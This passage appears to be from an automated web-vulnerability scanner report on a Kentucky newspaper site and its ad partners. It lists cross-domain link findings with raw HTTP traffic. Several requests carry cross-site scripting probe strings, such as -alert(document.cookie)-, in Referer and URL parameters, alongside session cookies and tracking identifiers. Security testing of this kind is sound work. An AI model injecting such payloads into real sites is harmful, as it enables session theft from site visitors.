Set-Cookie: FFpb=1190:dotconnect300x250,audiencescience300x250;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9:1190,2,9:933,56,15:826,276,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=5:0:1:0;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962#675816#812963#816392#675179,2#894866|0,1,1:0,1,1:1,1,1:0,1,1:0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:43:23 GMT;path=/;domain=.zedo.com;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=22
Expires: Tue, 03 May 2011 15:43:45 GMT
Date: Tue, 03 May 2011 15:43:23 GMT
Connection: close
Content-Length: 2141

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='dotconnect
...[SNIP]...
</span>")
document.write('<script language="JavaScript" src="http://a.collective-media.net/adj/cm.rev_lee/;sz=300x250;ord=' + Math.random() + '?" type="text/javascript"><\/script>
...[SNIP]...

19.16. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The page was loaded from a URL containing a query string:

http://ib.adnxs.com/ptj?member=311&inv_code=cm.rev_lee&size=300x250&imp_id=cm-77237941_1304437410,11fda490648f83c&referrer=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert%28%2522DORK%2522%29-%2522f8cf8d87874%3D1&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_lee%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-77237941_1304437410%2C11fda490648f83c%2CMiscellaneous%2Cax.{PRICEBUCKET}%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D975335%3Bcontx%3DMiscellaneous%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3D%3Bord%3D0.3433780161396228%3F

The response contains the following link to another domain:

http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1

Request

GET /ptj?member=311&inv_code=cm.rev_lee&size=300x250&imp_id=cm-77237941_1304437410,11fda490648f83c&referrer=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert%28%2522DORK%2522%29-%2522f8cf8d87874%3D1&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_lee%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-77237941_1304437410%2C11fda490648f83c%2CMiscellaneous%2Cax.{PRICEBUCKET}%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D975335%3Bcontx%3DMiscellaneous%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3D%3Bord%3D0.3433780161396228%3F HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: uuid2=4712109102545615229; icu=ChII3pUBEAoYBiAGKAYw27_K6gQQ27_K6gQYBQ..; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSmx=5E%IV!kszdkNSo6@-y`OawuG(Le#W21[=q; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 04-May-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII7IABEAoYASABKAEwpMWA7gQQpMWA7gQYAA..; path=/; expires=Mon, 01-Aug-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb317820=5_[r^208WM*c3rB20/dRn%/x5?enc=KVyPwvUoDEDy0k1iEFgJQAAAAKCZmQlA8tJNYhBYCUApXI_C9SgMQETWHf3Tbdd2fbkdUEPGZEGkIsBNAAAAACk9AwA3AQAAZAAAAAIAAAAGEgUABF8AAAEAAABVU0QAVVNEACwB-gAtHgAA9wgBAgUCAAUAAAAApx7ZMgAAAAA.&tt_code=cm.rev_lee&udj=uf%28%27a%27%2C+27%2C+1304437412%29%3Buf%28%27g%27%2C+1079%2C+1304437412%29%3Buf%28%27r%27%2C+332294%2C+1304437412%29%3Bppv%2882%2C+%278563433973720405572%27%2C+1304437412%2C+1314805412%2C+66646%2C+24324%29%3Bppv%2884%2C+%278563433973720405572%27%2C+1304437412%2C+1314805412%2C+66646%2C+24324%29%3Bppv%2811%2C+%278563433973720405572%27%2C+1304437412%2C+1314805412%2C+66646%2C+24324%29%3Bppv%2882%2C+%278563433973720405572%27%2C+1304437412%2C+1314805412%2C+66646%2C+24324%29%3Bppv%2884%2C+%278563433973720405572%27%2C+1304437412%2C+1314805412%2C+66646%2C+24324%29%3Bppv%2887%2C+%278563433973720405572%27%2C+1304437412%2C+1304523812%2C+66646%2C+24324%29%3Bppv%28619%2C+%278563433973720405572%27%2C+1304437412%2C+1304523812%2C+66646%2C+24324%29%3Bppv%28620%2C+%278563433973720405572%27%2C+1304437412%2C+1304523812%2C+66646%2C+24324%29%3Bppv%28621%2C+%278563433973720405572%27%2C+1304437412%2C+1304523812%2C+66646%2C+24324%29%3B&cnd=!jBesJgjWiAQQhqQUGAAghL4BKAAxmpmZyfUoDEBCEwgAEAAYACABKP7__________wFCCghSEAAYACADKAFCCghUEAAYACADKAFIAVAAWK08YABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E66646; path=/; expires=Wed, 04-May-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSmx=5E%IV!kszdkNSo6@-y`/H9#?HtZQZ.cyIxVm/e); path=/; expires=Mon, 01-Aug-2011 15:43:32 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 03 May 2011 15:43:32 GMT
Content-Length: 499

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_lee/;net=cm;u=,cm-77237941_1304437410,11fda490648f83c,Miscellaneous,ax.300;;cmw=owl;sz=300x250;net=cm;ord1=97
...[SNIP]...
</scr'+'ipt>');document.write('<iframe src="http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

19.17. http://open.ad.yieldmanager.net/a1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://open.ad.yieldmanager.net
Path:	/a1

Issue detail

The page was loaded from a URL containing a query string:

http://open.ad.yieldmanager.net/a1?V=4&pubId=22182210159&site=maysville-online.com&cntTy=js&cTopId=20201001&cSctn=index&ctLng=en-us&tagTy=multi_secure&nAdP=12&rFrame=1&flv=nf&cb=1304455224246&url=http%3A%2F%2Fwww.maysville-online.com%2Ffavicon.ico%3Fbe4e4%2522-alert(document.cookie)-%2522ccebc516c28%3D1&sz0=1000x30&dlv0=ipatf&conTy0=fn_news&sltId0=0&sz1=1360x2000&dlv1=ipatf&conTy1=fn_news&sltId1=1&sz2=728x90&dlv2=ipatf&conTy2=fn_news&sltId2=2&sz3=88x31&dlv3=ipatf&conTy3=fn_news&sltId3=3&sz4=300x250&dlv4=ipatf&conTy4=fn_news&sltId4=4&sz5=300x250&dlv5=ipbtf&conTy5=fn_news&sltId5=5&sz6=120x90&dlv6=ipbtf&conTy6=fn_news&sltId6=6&sz7=120x90&dlv7=ipbtf&conTy7=fn_news&sltId7=7&sz8=800x600&dlv8=ipatf&conTy8=fn_news&sltId8=8&sz9=300x600&dlv9=ipatf&conTy9=fn_news&sltId9=9&sz10=120x600&dlv10=ipatf&conTy10=fn_news&sltId10=10&sz11=728x90&dlv11=ipbtf&conTy11=fn_news&sltId11=11&ref=http%3A%2F%2Fburp%2Fshow%2F0&byt=%3Chead%3E%0A%3Cbase%20href%3D%22http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2Ftncms%2Flive%2F%22%3E%0A%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%3E%0A%3Cmeta%20name%3D%22description%22%20content%3D%22%22%3E%0A%3Cmeta%20name%3D%22keywords%22%20content%3D%22ledger%20independent%22%3E%0A%0A%3Cmeta%20property%3D%22og%3Atitle%22%20content%3D%22The%20Ledger%20Independent%20%7C%201-800-264-9091%22%3E%0A%3Cmeta%20property%3D%22og%3Asite_name%22%20content%3D%22Ledger%20Independent%22%3E%0A%0A%0A%0A%3Cmeta%20property%3D%22og%3Aimage%22%20content%3D%22http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2Ftncms%2Flive%2Fglobal%2Fresources%2Fimages%2Fledger_logo.jpg%22%3E%0A

The response contains the following link to another domain:

http://cookex.amp.yahoo.com/v2/cexposer/SIG=1vvc47ova/*http:/open.ad.yieldmanager.net/a1?V=4&pubId=22182210159&site=maysville-online.com&cntTy=js&cTopId=20201001&cSctn=index&ctLng=en-us&tagTy=multi_secure&nAdP=12&rFrame=1&flv=nf&cb=1304455224246&url=http%3A%2F%2Fwww.maysville-online.com%2Ffavicon.ico%3Fbe4e4%2522-alert(document.cookie)-%2522ccebc516c28%3D1&sz0=1000x30&dlv0=ipatf&conTy0=fn_news&sltId0=0&sz1=1360x2000&dlv1=ipatf&conTy1=fn_news&sltId1=1&sz2=728x90&dlv2=ipatf&conTy2=fn_news&sltId2=2&sz3=88x31&dlv3=ipatf&conTy3=fn_news&sltId3=3&sz4=300x250&dlv4=ipatf&conTy4=fn_news&sltId4=4&sz5=300x250&dlv5=ipbtf&conTy5=fn_news&sltId5=5&sz6=120x90&dlv6=ipbtf&conTy6=fn_news&sltId6=6&sz7=120x90&dlv7=ipbtf&conTy7=fn_news&sltId7=7&sz8=800x600&dlv8=ipatf&conTy8=fn_news&sltId8=8&sz9=300x600&dlv9=ipatf&conTy9=fn_news&sltId9=9&sz10=120x600&dlv10=ipatf&conTy10=fn_news&sltId10=10&sz11=728x90&dlv11=ipbtf&conTy11=fn_news&sltId11=11&ref=http%3A%2F%2Fburp%2Fshow%2F0&byt=%3Chead%3E%0A%3Cbase%20href%3D%22http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2Ftncms%2Flive%2F%22%3E%0A%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%3E%0A%3Cmeta%20name%3D%22description%22%20content%3D%22%22%3E%0A%3Cmeta%20name%3D%22keywords%22%20content%3D%22ledger%20independent%22%3E%0A%0A%3Cmeta%20property%3D%22og%3Atitle%22%20content%3D%22The%20Ledger%20Independent%20%7C%201-800-264-9091%22%3E%0A%3Cmeta%20property%3D%22og%3Asite_name%22%20content%3D%22Ledger%20Independent%22%3E%0A%0A%0A%0A%3Cmeta%20property%3D%22og%3Aimage%22%20content%3D%22http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2Ftncms%2Flive%2Fglobal%2Fresources%2Fimages%2Fledger_logo.jpg%22%3E%0A

Request

GET /a1?V=4&pubId=22182210159&site=maysville-online.com&cntTy=js&cTopId=20201001&cSctn=index&ctLng=en-us&tagTy=multi_secure&nAdP=12&rFrame=1&flv=nf&cb=1304455224246&url=http%3A%2F%2Fwww.maysville-online.com%2Ffavicon.ico%3Fbe4e4%2522-alert(document.cookie)-%2522ccebc516c28%3D1&sz0=1000x30&dlv0=ipatf&conTy0=fn_news&sltId0=0&sz1=1360x2000&dlv1=ipatf&conTy1=fn_news&sltId1=1&sz2=728x90&dlv2=ipatf&conTy2=fn_news&sltId2=2&sz3=88x31&dlv3=ipatf&conTy3=fn_news&sltId3=3&sz4=300x250&dlv4=ipatf&conTy4=fn_news&sltId4=4&sz5=300x250&dlv5=ipbtf&conTy5=fn_news&sltId5=5&sz6=120x90&dlv6=ipbtf&conTy6=fn_news&sltId6=6&sz7=120x90&dlv7=ipbtf&conTy7=fn_news&sltId7=7&sz8=800x600&dlv8=ipatf&conTy8=fn_news&sltId8=8&sz9=300x600&dlv9=ipatf&conTy9=fn_news&sltId9=9&sz10=120x600&dlv10=ipatf&conTy10=fn_news&sltId10=10&sz11=728x90&dlv11=ipbtf&conTy11=fn_news&sltId11=11&ref=http%3A%2F%2Fburp%2Fshow%2F0&byt=%3Chead%3E%0A%3Cbase%20href%3D%22http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2Ftncms%2Flive%2F%22%3E%0A%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%3E%0A%3Cmeta%20name%3D%22description%22%20content%3D%22%22%3E%0A%3Cmeta%20name%3D%22keywords%22%20content%3D%22ledger%20independent%22%3E%0A%0A%3Cmeta%20property%3D%22og%3Atitle%22%20content%3D%22The%20Ledger%20Independent%20%7C%201-800-264-9091%22%3E%0A%3Cmeta%20property%3D%22og%3Asite_name%22%20content%3D%22Ledger%20Independent%22%3E%0A%0A%0A%0A%3Cmeta%20property%3D%22og%3Aimage%22%20content%3D%22http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2Ftncms%2Flive%2Fglobal%2Fresources%2Fimages%2Fledger_logo.jpg%22%3E%0A HTTP/1.1
Host: open.ad.yieldmanager.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 15:40:25 GMT
Location: http://cookex.amp.yahoo.com/v2/cexposer/SIG=1vvc47ova/*http%3A//open.ad.yieldmanager.net/a1?V=4&pubId=22182210159&site=maysville-online.com&cntTy=js&cTopId=20201001&cSctn=index&ctLng=en-us&tagTy=multi_secure&nAdP=12&rFrame=1&flv=nf&cb=1304455224246&url=http%3A%2F%2Fwww.maysville-online.com%2Ffavicon.ico%3Fbe4e4%2522-alert(document.cookie)-%2522ccebc516c28%3D1&sz0=1000x30&dlv0=ipatf&conTy0=fn_news&sltId0=0&sz1=1360x2000&dlv1=ipatf&conTy1=fn_news&sltId1=1&sz2=728x90&dlv2=ipatf&conTy2=fn_news&sltId2=2&sz3=88x31&dlv3=ipatf&conTy3=fn_news&sltId3=3&sz4=300x250&dlv4=ipatf&conTy4=fn_news&sltId4=4&sz5=300x250&dlv5=ipbtf&conTy5=fn_news&sltId5=5&sz6=120x90&dlv6=ipbtf&conTy6=fn_news&sltId6=6&sz7=120x90&dlv7=ipbtf&conTy7=fn_news&sltId7=7&sz8=800x600&dlv8=ipatf&conTy8=fn_news&sltId8=8&sz9=300x600&dlv9=ipatf&conTy9=fn_news&sltId9=9&sz10=120x600&dlv10=ipatf&conTy10=fn_news&sltId10=10&sz11=728x90&dlv11=ipbtf&conTy11=fn_news&sltId11=11&ref=http%3A%2F%2Fburp%2Fshow%2F0&byt=%3Chead%3E%0A%3Cbase%20href%3D%22http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2Ftncms%2Flive%2F%22%3E%0A%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%3E%0A%3Cmeta%20name%3D%22description%22%20content%3D%22%22%3E%0A%3Cmeta%20name%3D%22keywords%22%20content%3D%22ledger%20independent%22%3E%0A%0A%3Cmeta%20property%3D%22og%3Atitle%22%20content%3D%22The%20Ledger%20Independent%20%7C%201-800-264-9091%22%3E%0A%3Cmeta%20property%3D%22og%3Asite_name%22%20content%3D%22Ledger%20Independent%22%3E%0A%0A%0A%0A%3Cmeta%20property%3D%22og%3Aimage%22%20content%3D%22http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2Ftncms%2Flive%2Fglobal%2Fresources%2Fimages%2Fledger_logo.jpg%22%3E%0A
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 2189

The document has moved <A HREF="http://cookex.amp.yahoo.com/v2/cexposer/SIG=1vvc47ova/*http%3A//open.ad.yieldmanager.net/a1?V=4&pubId=22182210159&site=maysville-online.com&cntTy=js&cTopId=20201001&cSctn=index&ctLng=en-us&tagTy=multi_secure&nAdP=12&rFrame=1&flv=nf&cb=1304455224246&url=http%3A%2F%2Fwww.maysville-online.com%2Ffavicon.ico%3Fbe4e4%2522-alert(document.cookie)-%2522ccebc516c28%3D1&sz0=1000x30&dlv0=ipatf&conTy0=fn_news&sltId0=0&sz1=1360x2000&dlv1=ipatf&conTy1=fn_news&sltId1=1&sz2=728x90&dlv2=ipatf&conTy2=fn_news&sltId2=2&sz3=88x31&dlv3=ipatf&conTy3=fn_news&sltId3=3&sz4=300x250&dlv4=ipatf&conTy4=fn_news&sltId4=4&sz5=300x250&dlv5=ipbtf&conTy5=fn_news&sltId5=5&sz6=120x90&dlv6=ipbtf&conTy6=fn_news&sltId6=6&sz7=120x90&dlv7=ipbtf&conTy7=fn_news&sltId7=7&sz8=800x600&dlv8=ipatf&conTy8=fn_news&sltId8=8&sz9=300x600&dlv9=ipatf&conTy9=fn_news&sltId9=9&sz10=120x600&dlv10=ipatf&conTy10=fn_news&sltId10=10&sz11=728x90&dlv11=ipbtf&conTy11=fn_news&sltId11=11&ref=http%3A%2F%2Fburp%2Fshow%2F0&byt=%3Chead%3E%0A%3Cbase%20href%3D%22http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2Ftncms%2Flive%2F%22%3E%0A%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%3E%0A%3Cmeta%20name%3D%22description%22%20content%3D%22%22%3E%0A%3Cmeta%20name%3D%22keywords%22%20content%3D%22ledger%20independent%22%3E%0A%0A%3Cmeta%20property%3D%22og%3Atitle%22%20content%3D%22The%20Ledger%20Independent%20%7C%201-800-264-9091%22%3E%0A%3Cmeta%20property%3D%22og%3Asite_name%22%20content%3D%22Ledger%20Independent%22%3E%0A%0A%0A%0A%3Cmeta%20property%3D%22og%3Aimage%22%20content%3D%22http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2Ftncms%2Flive%2Fglobal%2Fresources%2Fimages%2Fledger_logo.jpg%22%3E%0A">here</A>
...[SNIP]...

19.18. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/recommendations.php?api_key=131596456859393&border_color=%23fff&colorscheme=light&font=arial&header=false&height=310&locale=en_US&sdk=joey&site=www.maysville-online.com&width=278

The response contains the following links to other domains:

http://bloximages.chicago2.vip.townnews.com/maysville-online.com/content/tncms/assets/editorial/8/57/30c/85730c68-7199-11e0-b137-001cc4c002e0-revisions/4db9685498a03.preview-100.jpg
http://bloximages.chicago2.vip.townnews.com/maysville-online.com/content/tncms/assets/editorial/9/96/e5e/996e5e3c-71d7-11e0-8994-001cc4c002e0-revisions/4db9d07cd392a.preview-100.jpg
http://bloximages.chicago2.vip.townnews.com/maysville-online.com/content/tncms/assets/editorial/a/db/d5e/adbd5ea2-7398-11e0-924e-001cc4c002e0-revisions/4dbcc1e96b9e3.preview-100.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vSJ96PL2YpP.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/WU1xUSaLgfA.css
http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js
http://www.maysville-online.com/content/tncms/live/global/resources/images/ledger_logo.jpg
http://www.maysville-online.com/news/local/article_0732eda6-70e9-11e0-a714-001cc4c002e0.html
http://www.maysville-online.com/news/local/article_9502ab80-71d9-11e0-98b7-001cc4c002e0.html
http://www.maysville-online.com/news/local/article_9da9f91a-7453-11e0-9faa-001cc4c03286.html
http://www.maysville-online.com/news/local/obituaries/article_f7e6be8a-7044-11e0-9f45-001cc4c03286.html
http://www.maysville-online.com/news/opinion/blogs/sports_perspectives_with_ron_bailey/article_3e17dd4c-726d-11e0-bad4-001cc4c002e0.html
http://www.maysville-online.com/news/opinion/blogs/sports_perspectives_with_ron_bailey/article_44fedbbc-7199-11e0-9fb5-001cc4c002e0.html

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.53.38.83
X-Cnection: close
Date: Tue, 03 May 2011 15:42:42 GMT
Content-Length: 12368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/WU1xUSaLgfA.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vSJ96PL2YpP.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_592096861100476d"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.maysville-online.com/news/local/article_9502ab80-71d9-11e0-98b7-001cc4c002e0.html" title="MCTC among top 120 community colleges in the nation" target="_top"><img class="img" src="http://bloximages.chicago2.vip.townnews.com/maysville-online.com/content/tncms/assets/editorial/9/96/e5e/996e5e3c-71d7-11e0-8994-001cc4c002e0-revisions/4db9d07cd392a.preview-100.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.maysville-online.com/news/local/article_9502ab80-71d9-11e0-98b7-001cc4c002e0.html" target="_top">MCTC among top 120 community colleges in the nation</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_37a13b1a79fb443d"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.maysville-online.com/news/opinion/blogs/sports_perspectives_with_ron_bailey/article_3e17dd4c-726d-11e0-bad4-001cc4c002e0.html" title="Dawahares/KHSAA Hall of Fame adds Fleming County Star" target="_top"><img class="img" src="http://www.maysville-online.com/content/tncms/live/global/resources/images/ledger_logo.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.maysville-online.com/news/opinion/blogs/sports_perspectives_with_ron_bailey/article_3e17dd4c-726d-11e0-bad4-001cc4c002e0.html" target="_top">Dawahares/KHSAA Hall of Fame adds Fleming County Star</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_fe7b751e0e31d4"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.maysville-online.com/news/opinion/blogs/sports_perspectives_with_ron_bailey/article_44fedbbc-7199-11e0-9fb5-001cc4c002e0.html" title="Chris Harrison...s son to be a Bulldog" target="_top"><img class="img" src="http://bloximages.chicago2.vip.townnews.com/maysville-online.com/content/tncms/assets/editorial/8/57/30c/85730c68-7199-11e0-b137-001cc4c002e0-revisions/4db9685498a03.preview-100.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.maysville-online.com/news/opinion/blogs/sports_perspectives_with_ron_bailey/article_44fedbbc-7199-11e0-9fb5-001cc4c002e0.html" target="_top">Chris Harrison...s son to be a Bulldog</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_31af2005bbf812fa"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.maysville-online.com/news/local/article_9da9f91a-7453-11e0-9faa-001cc4c03286.html" title="Four slain in Ohio; suspect dies in police shootout" target="_top"><img class="img" src="http://bloximages.chicago2.vip.townnews.com/maysville-online.com/content/tncms/assets/editorial/a/db/d5e/adbd5ea2-7398-11e0-924e-001cc4c002e0-revisions/4dbcc1e96b9e3.preview-100.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.maysville-online.com/news/local/article_9da9f91a-7453-11e0-9faa-001cc4c03286.html" target="_top">Four slain in Ohio; suspect dies in police shootout</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_15c2e9bc1854bc33"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.maysville-online.com/news/local/article_0732eda6-70e9-11e0-a714-001cc4c002e0.html" title="Clooney hospitalized in Washington, D.C." target="_top"><img class="img" src="http://www.maysville-online.com/content/tncms/live/global/resources/images/ledger_logo.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.maysville-online.com/news/local/article_0732eda6-70e9-11e0-a714-001cc4c002e0.html" target="_top">Clooney hospitalized in Washington, D.C.</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_2c2f258340e2e300"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.maysville-online.com/news/local/obituaries/article_f7e6be8a-7044-11e0-9f45-001cc4c03286.html" title="MR. DEVAUGHN" target="_top"><img class="img" src="http://www.maysville-online.com/content/tncms/live/global/resources/images/ledger_logo.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.maysville-online.com/news/local/obituaries/article_f7e6be8a-7044-11e0-9f45-001cc4c03286.html" target="_top">MR. DEVAUGHN</a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=2" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

19.19. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/app/scripts/ajaxModules/upickemDeal.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A00&countColor=FF4A00&regLink=true&title=&upickemSignup=&limit=

The response contains the following link to another domain:

http://maysville.upickem.net/engine/splash.aspx?contestid=27231&cid=todaysdeal

Request

GET /app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A00&countColor=FF4A00&regLink=true&title=&upickemSignup=&limit= HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Date: Tue, 03 May 2011 15:38:42 GMT
X-TN-ServedBy: cms.web.80
X-Loop: 1
X-PHP-Engine: enabled
Real-Hostname: maysville-online.com
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 5889

function LoadCountDownClock(astrUniqueID,astrYear,astrMonth,astrDay,astrHour,astrMinute,astrSecond,astrFormat){var strHTML;strHTML='<div id="'+astrUniqueID+'"></div>';document.write(strHTML);CountDown
...[SNIP]...
<dt><a href="http://maysville.upickem.net/engine/splash.aspx?contestid=27231&cid=todaysdeal" rel="external"><img src="'+upickemDeals[0][2]+'" />
...[SNIP]...
